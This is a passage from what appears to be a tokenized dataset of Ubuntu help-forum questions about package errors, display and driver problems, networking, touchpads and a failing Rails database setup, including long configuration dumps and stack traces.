/var/cache/apt/archives/libunity9_7.1.2+13.10.20131010-0ubuntu2_amd64.deb /var/cache/apt/archives/udev_204-0ubuntu19.1_amd64.deb /var/cache/apt/archives/bind9-host_1 % 3a9.9.3.dfsg.p2-4ubuntu1.1_amd64.deb /var/cache/apt/archives/dnsutils_1 % 3a9.9.3.dfsg.p2-4ubuntu1.1_amd64.deb /var/cache/apt/archives/cpp-4.8_4.8.1-10ubuntu9_amd64.deb /var/cache/apt/archives/cups-client_1.7.0~rc1-0ubuntu5.2_amd64.deb /var/cache/apt/archives/cups_1.7.0~rc1-0ubuntu5.2_amd64.deb /var/cache/apt/archives/libglib2.0-bin_2.38.1-0ubuntu1_amd64.deb /var/cache/apt/archives/aptdaemon_1.1.1-0ubuntu4_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm completely lost . there 's so much here i ca n't comprehend what i did to make this happen . attempted : apt-get update -- fix-missing then apt-get -f install the tutorial linked above .
428594	how to reset default app for filetype ?	how can i set a filetype to always open with a specific application ? in .local/share/applications/mimeapps.list there was this line - application/x-extension-jap=gedit.desktop ; jalbum.desktop ; it always opens with gedit , and jalbum does not appear in the open with list . since jalbum should be ( and always used to be ) the default application , i changed it to application/x-extension-jap=jalbum.desktop ; gedit.desktop ; but that does n't seem to change anything . in answers to similar questions `` ubuntu tweak '' has been suggested as a way to manage this problem , but that option seems to have disappeared from current versions of `` tweak '' . i tried fixing this using the nautilus properties display , but jalbum does n't show up there as an alternative application . is there some other way to fix this ?
428601	ubuntu server - ca n't browse web using lxde , apache works fine	i recently installed ubuntu server ( the latest lts , i think it 's 12.04 ) . i also have the lxde environment installed for browsing . firefox , ping and nslookup were working fine . now they do n't . when i click the networking icon in the bottom right corner , it says `` no devices available '' what 's strange is that apache2 , samba , vnc and ssh are all still up and working fine . any thoughts ? i did install windows xp in virtualbox around the time it stopped running , i wonder if that has anything to do with it ...
428602	settings for glidepoint touchpad/trackpoint on dell latitude	couple of issues with the touchpad and trackpoint for my dell latitude laptop ( ubuntu 12.04 ) . first , there 's no `` touchpad '' tab on the mouse settings in system settings . i 'd like to be able to use 2-finger scrolling on the touchpad ( and also adjust the sensitivity ) , and to enable middle-mouse-button scrolling on the trackpoint . synclient gives an error : could n't find synaptics properties . no synaptics driver loaded ? . the relevent output of xinput is : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ glidepoint virtual touchpad id=13 [ slave pointer ( 2 ) ] i found a file in /usr/share/x11/xorg.conf.d/ that has code to enable middle mouse scrolling , but it looks like it 's only triggered if trackpoint|dualpoint stick is matched in the xinput list ? oddly , the middle-mouse scrolling seems to work only in chrome 's pdf viewer , but no where else . i tried using gpointer-device-settings but it crashes/segfaults every time i run it . i 've tried a couple of things about alps drivers , but those seem to come into play when the glidepoint device shows up in xinput as regular mouse , which i do n't think is the case here .
428603	multiple wifi-adapters connection in ubuntu	i have multiple wifi adapters and i use them to connect to multiple networks from one computer ( e.g . connected to lan and internet at the same time , etc. ) . on windows and mac i can do this with no problem ... sort of a plug and play process ; but on ubuntu one wifi connection always takes over the other one after just a few seconds , then it becomes one single connection . also when i do on the terminal ip route show this shows up : default via 192.168.1.254 dev wlan0 proto static 169.254.0.0/16 dev wlan0 scope link metric 1000 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.81 metric 9 192.168.1.0/24 dev wlan5 proto kernel scope link src 192.168.1.1 metric 9 here , my internet router is 192.168.1.254 , and wlan0 is connected to it , and got assigned the byte 81 for the address . wlan5 is connected to my lan network , and got assigned 1 as the last byte . a few things : 1 ) i noticed that it says default via 192.168.1.254 dev wlan0 ... is that suppose to be default ? 2 ) both wlan0 and wlan5 have `` 192.168.1.0/24 '' as destination . are they suppose to have the same destination address ? how can i configure my wifi setups on ubuntu so that each adapter becomes a single/individual connection to a network ? thanks in advance ! ! ! !
428605	why does abiword crash or behave oddly on xubuntu ?	after spending hours composing a document on abiword it suddenly , for no apparent reason , said it needed to close and i lost all my work . is this a common abiword problem , linux problem or other ? also any time i am typing , suddenly my last sentence or multiple paragraphs will be randomly slammed into the middle of my work ? what 's up with that ? also would you recommend mint xfce over xubuntu ? i have a 100gb hard drive and only 1gb ram which i assume the stock computer uses some of that , but how much i do n't know .
428606	is it better to remove software using ubuntu sofware center or synaptic package manager ?	i 'm very new and i accidentally installed 6 text editors via the synaptic package manager , and one from the ubuntu software center . i know i can `` remove '' the text editing software with one click in the ubuntu software center . is that the best way to remove them or would it be better to remove them via the synaptic package mangager or perhaps there 's an even better way ?
428611	bad symbols on my eclipse c++ installation	http : //stackoverflow.com/questions/9131763/eclipse-cdt-c11-c0x-support i come from that website . i have a c++ project that compiles with g++-4.8 without problems . i just wanted to use std : :int8_t from the cstdint file . problem is the eclipse indexer ca n't resolve the name . i went to the csdint file and in the initial macro it expands __cplusplus to 199711l instead of 201103l . in my project settings i added std=c++11 and in the compiler flags i addded gxx_experimental_cxx0x and did i say it compiles ? it 's very frustrating , i suppose i can live without the indexer , but then again what is the purpose of an ide if it 's giving me error false positives .
428614	no network connection with installed version but usb version works	this is my first shot at the linux world and particularly the ubuntu segment . i installed ubuntu 13.10 from a usb stick on an old dell inspiron 1510 and if i boot the installed version i am unable to get a network connection , either wifi or ethernet . if i boot from the usb stick , the same one i used to install from , i get an ethernet connection but no wifi connection . ( yes i do have a working wireless network here at home . this laptop can turn the wifi off and on using fn - f2 but that does n't seem to do anything , not even turn the wifi led on . ) i see that others have had a similar experience but was unable to find a solution . the results of a search on this site suggested running lshw -c network which i did for both cases , i.e . booting the installed version and booting the usb stick version . there were several differences . i have n't yet figured out how to capture an output stream to a text file ( been a long time since i used a command line ) but the significant differences are : installed version : network capability : bus_master cap_list configuration : driver=wl latency=0 resource : irq:18 *-network unclaimed resource irq 18 usb stick version : *-network capability : pm msi pciexpress bus_master cap_list configuration : driver=b43_pci_bridge latency=0 ethernet section logical name : eth0 serial : 00:19 : b9:5b:60 : c7 size 100 mbits/sec capacity : 100 mbits/sec capabilities : pm bus_master cap_list ethernet physical mil 10bt 10bt_fd 100bt 100bt_fd autonegotiation configuration : autonegotiation=on broadcasts=on driver=b44 driverversion=2.0 duplex=full ip=192.168.1.102 latency=64 link=yes multicast=yes port = twisted pair speed=100mbits/sec resource : irq:21 it seems very strange that the same software package would configure things two different ways . i sure would appreciate some suggestions .
428615	apt-get : does apt-get store its # updates somewhere ?	when i am using apt-get , and often times when i login via ssh i get a statement that : x upgraded , y newly installed , z to remove and a not upgraded . ( obviously x , y , z , a are replaced with the relevant numbers ) . is there a place or a file where these are kept ? the shell seems to know when i login , and i scoured the motd files to no avail . is there anything on the system that i can get to in order to determine if the machine has an update waiting ? the context for the request : i want to use it as an exercise to modify my powerline-shell and i do n't want to do something taxing , since the prompt call needs to stay fast-moving . if those variables can be found and are > 0 then i am good to go .
428616	display port monitor suddenly broken	i 'm running kubuntu 13.10 and all has been good for ages . i think some recent update has borked my x config and i have no idea how to fix it . i have a dell laptop with a dell monitor on a display port attached to it . all has been great ( with the latest nvidia drivers ) until i rebooted over the weekend and both screens went black . unplug the display port , the laptop monitor springs into life . plug in via hdmi , they both work ( all be it with the big external monitor at a lower than optimal resolution ) . the logs show the monitor is being recognised on the display port , and ps -a on a text terminal while the graphics terminal is black shows plasma-desktop and all the apps running happily , i just ca n't see them . i am on xorg/edgies ppa , but a revert to the stock nvidia and x-org made no change to the symptoms . laptop model and kernal are : latitude-e6530 3.11.0-17-generic lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:19.0 ethernet controller [ 0200 ] : intel corporation 82579lm gigabit network connection [ 8086:1502 ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 4 [ 8086:1e16 ] ( rev c4 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 6 [ 8086:1e1a ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation qm77 express chipset lpc controller [ 8086:1e55 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108glm [ nvs 5200m ] [ 10de:0dfc ] ( rev a1 ) 01:00.1 audio device [ 0403 ] : nvidia corporation gf108 high definition audio controller [ 10de:0bea ] ( rev a1 ) 03:00.0 network controller [ 0280 ] : intel corporation centrino ultimate-n 6300 [ 8086:422b ] ( rev 35 ) 0c:00.0 sd host controller [ 0805 ] : o2 micro , inc. device [ 1217:8221 ] ( rev 05 ) the intel graphics card is disabled in the bios . any ideas how to start sorting this out ? i have no clue where to go from here . ta . more information : i 've now managed to get the monitor working again an the dp but only if i have the dvi cable plugged in as well and the subsequent monitor disabled in the nvidi-config . as soon as i unplug the dvi it goes back to the blank screen . the x.org.conf file is it seems to think it has 4 screens attached ? ? section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' screen 3 `` screen3 '' rightof `` screen2 '' screen 4 `` screen4 '' rightof `` screen3 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor3 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor4 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card0 '' driver `` modesetting '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` hwcursor '' # [ < bool > ] # option `` noaccel '' # [ < bool > ] # option `` shadowfb '' # [ < bool > ] # option `` videokey '' # < i > # option `` wrappedfb '' # [ < bool > ] # option `` glxvblank '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` pageflip '' # [ < bool > ] # option `` swaplimit '' # < i > # option `` asyncutsdfs '' # [ < bool > ] identifier `` card1 '' driver `` nouveau '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` card2 '' driver `` nvidia '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card3 '' driver `` fbdev '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card4 '' driver `` vesa '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` card3 '' monitor `` monitor3 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen4 '' device `` card4 '' monitor `` monitor4 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
428621	graphics card properties	i have an intel 2nd generation core processor family integrated graphics . i want to know if there is a way to change my graphics properties like there is windows ? i 'm also running ubuntu 13.10 .
428625	which graphics driver to install in ubuntu 13.10	so when i first installed linux i went and got this like amd catalyst driver off amd 's website and when it installed it had some error and made me restart then the pc would not boot up correctly just a blank screen with a cursor shaped like a cross . so i erased and re-installed linux and now i 'm going to try the ones listed in the software and updates thing , but theirs the open-source gallium 0.4 some people say is better , but then i hear that fglrx is 10 times faster ? which fglrx do i install ? i got fglrx-updates and just plain fglrx ? i am doing this on my laptop it has an amd radeon hd 7520g .
428631	how do i fix this problem ?	~ $ sudo apt-get -f install e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
428639	how do i get my system/ applications to start normally , and switch between os 's ?	when i go through the normal steps to switch between my os 's , ubuntu automatically starts up , when before i had the option of choosing my os ( windows 7 / ubuntu ) when i started my computer up . i press escape on the start up menu and see a screen resembling terminal , but i do n't know exactly what it means because i am new to ubuntu . i 've first saw the screen after installing ftl and trying to launch it , which resulted with me getting logged out ( this happened every time i attempted ) . i ca n't see either screen long enough to compare them , and figure out what to do . how do i get my system/ applications to start normally ?
428640	pasted text doubles up	when i cut/copy and paste , text doubles up . so if i say 'good thing ' it comes out as : good thinggood thing ' . how can i solve this annoying issue ?
428641	how can i see a list of new packages for my system	i run muon every few days to keep my system up to date . in the lower left corner , there is a number of available packages which keeps getting bigger ! it makes me curious to see what they are . i would like a way to list these new packages ( with short descriptions ) to see if any of them interest me ( perhaps , newer than some date i would specify ) . just to be clear , i am interested in seeing `` new '' packages - not updates to current ones - which muon already does - at least for the ones i have installed . since my sources lists include a number of repos and ppas , i 'd like something that takes this into account . i like guis , but am also comfortable with using utilities like apt-get from the command line . i am currently running kubuntu precise with a lot of backports including kde 4.12.2 on my notebook .
428645	ca n't install 13.10 x64 version , fails instaliation	when i try to install ubuntu-13.10-desktop-amd64 , i 'm getting error ca n't copy some files . ubuntu-13.04-desktop-amd64 version istall without errors . i 'm installing from usb . i tried to re-download iso image few times - result the same . ? ? ?
428649	grub and tty display incorrectly on ubuntu 12.04	i am using ubuntu 12.04 x64 desktop edition . previously it works fine , but just now i found that there is a while screen with some black dots when i log off . then i found that all the grub , tty , and even ubuntu startup screen is not functioning properly . i tried to re-install lightdm , but it does not work . the linux kernel is 3.2.0-23 . i am using an amd graphic card . the x display is working fine . the grub . previously the font was much smaller and the background was purple the start screen . it should be purple in the background , ubuntu in the middle with five dots below . now i think the blocks in the middle is `` ubuntu '' ? all tty are like this . now i can not read the words ! please advise on how to solve the problem . thank you !
428652	having trouble installing ubuntu on a windows 7 pc	it has been a few years since i last used linux . i have an hp pc using an amd fx-8100 eight processor x64 bit cpu , with 10 gb of ram and 2 tb of disk . i have tried and tried and tried to get the ubuntu 12.04 lts to install . it hangs when you get to the `` preparing to install ubuntu '' screen . i have downloaded both 32 bit and 64 bit iso 's . burned several dvd 's and tried using a usb stick too . to no avail . it just hangs . now , i have windows 7 pro on the one hard drive . i have looked up and noted several pages that say , you have to first make some room by shrinking the windows os . then you have to create a new partition , and load ubuntu into that partition . is the fact that there are no free partitions on my hd causing the ubuntu installer to hang ? also , i feel it would be easier to just wipe the drive and then install ubuntu and then install virtual box running windows . i hesitate to do that , because of the installer hanging . am i correct ? please advise . thank you .
428653	trouble with rake db : setup	everyone ! i am trying to pull a github file using rake db : setup , but i get an error every time , no matter how many times i reinstall postgresql or check rails . here 's the error i 'm getting : hifriend @ ubuntu : ~/refugerestrooms $ sudo -u root -h bundle exec rake db : setup -- trace ** invoke db : setup ( first_time ) ** invoke db : schema : load_if_ruby ( first_time ) ** invoke db : create ( first_time ) ** invoke db : load_config ( first_time ) ** execute db : load_config ** execute db : create fe_sendauth : no password supplied /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `initialize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `new' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `connect' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:542 : in `initialize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:41 : in `new' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:41 : in `postgresql_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:440 : in `new_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:450 : in `checkout_new_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:421 : in `acquire_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:356 : in `block in checkout' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:355 : in `checkout' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:265 : in `block in connection' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:264 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:546 : in `retrieve_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_handling.rb:79 : in `retrieve_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_handling.rb:53 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/postgresql_database_tasks.rb:8 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/postgresql_database_tasks.rb:17 : in `create' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:72 : in `create' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:86 : in `block in create_current' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:182 : in `block in each_current_configuration' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:181 : in `each' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:181 : in `each_current_configuration' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:85 : in `create_current' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/railties/databases.rake:20 : in `block ( 2 levels ) in < top ( required ) > ' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `call' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `block in execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:175 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:197 : in `block in invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:174 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:197 : in `block in invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:174 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:161 : in `invoke' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:149 : in `invoke_task' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `block ( 2 levels ) in top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `block in top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:115 : in `run_with_threads' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:100 : in `top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:78 : in `block in run' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:165 : in `standard_exception_handling' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:75 : in `run' /var/lib/gems/2.0.0/gems/rake-10.1.1/bin/rake:33 : in ` < top ( required ) > ' /usr/local/bin/rake:23 : in `load' /usr/local/bin/rake:23 : in ` < main > ' could n't create database for { `` adapter '' = > '' postgresql '' , `` encoding '' = > '' unicode '' , `` database '' = > '' bathrooms_development '' , `` pool '' = > 5 , `` host '' = > '' localhost '' , `` username '' = > '' root '' , `` password '' = > nil } fe_sendauth : no password supplied /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `initialize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `new' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `connect' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:542 : in `initialize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:41 : in `new' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:41 : in `postgresql_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:440 : in `new_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:450 : in `checkout_new_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:421 : in `acquire_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:356 : in `block in checkout' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:355 : in `checkout' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:265 : in `block in connection' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:264 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:546 : in `retrieve_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_handling.rb:79 : in `retrieve_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_handling.rb:53 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/postgresql_database_tasks.rb:8 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/postgresql_database_tasks.rb:17 : in `create' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:72 : in `create' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:86 : in `block in create_current' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:182 : in `block in each_current_configuration' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:181 : in `each' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:181 : in `each_current_configuration' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/tasks/database_tasks.rb:85 : in `create_current' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/railties/databases.rake:20 : in `block ( 2 levels ) in < top ( required ) > ' 